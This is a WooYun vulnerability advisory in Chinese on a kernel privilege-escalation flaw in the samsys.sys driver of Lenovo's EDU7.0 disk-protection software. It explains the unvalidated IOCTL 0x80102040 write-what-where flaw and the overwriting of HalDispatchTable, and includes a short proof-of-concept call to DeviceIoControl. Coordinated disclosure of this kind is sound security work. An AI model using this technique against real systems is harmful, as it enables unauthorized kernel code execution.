当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038673

漏洞标题:联想硬盘保护系统EDU7.0 samsys.sys 内核权限提升

相关厂商:联想

漏洞作者: 某熊

提交时间:2013-10-01 11:18

修复时间:2013-12-30 11:18

公开时间:2013-12-30 11:18

漏洞类型:权限提升

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-01: 细节已通知厂商并且等待厂商处理中
2013-10-04: 厂商已经确认,细节仅向厂商公开
2013-10-07: 细节向第三方安全合作伙伴开放
2013-11-28: 细节向核心白帽子及相关领域专家公开
2013-12-08: 细节向普通白帽子公开
2013-12-18: 细节向实习白帽子公开
2013-12-30: 细节向公众公开

简要描述:

联想硬盘保护系统EDU7.0是配在联想商用台式机上的一套系统,其Windows平台上的驱动程序存在安全漏洞,允许恶意用户态程序向指定内核地址并写入可以控制的数据,进而允许用户覆盖某些callback指针,绕过限制在内核态执行代码。

详细说明:

驱动在处理iocontrolcode为0x80102040的iocontrol时,直接使用了InBuffer里面的指针并写入数据,而没有经过任何的验证,恶意用户态程序可以通过调用该IoControl,并指定一个内核态指针,实现向内核写入数据。
由于写入的数据也是可以控制的,用户态进程可以覆盖如HalDispatchTable的内核函数指针表,进一步在内核态执行自己的代码。
考虑到该系统广泛安装于商用计算机上,这个问题可能导致企业内部的用户绕过权限限制和主动防御系统执行任意内核代码,应当尽快修复并推出补丁。

漏洞证明:

hDevice = CreateFile("\\\\.\\Samsys",
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		0,
		OPEN_EXISTING,
		0,
		0);
	InBuff[1] = offset;
	InBuff[2] = 1;
	InBuff[3] = (ULONG)(0xdeaddead); //传入内核地址
	return DeviceIoControl(hDevice, 0x80102040, InBuff, sizeof(InBuff), OutBuff, sizeof(OutBuff), &t, 0);


修复方案:

验证。

版权声明:转载请注明来源 某熊@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-04 00:07

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无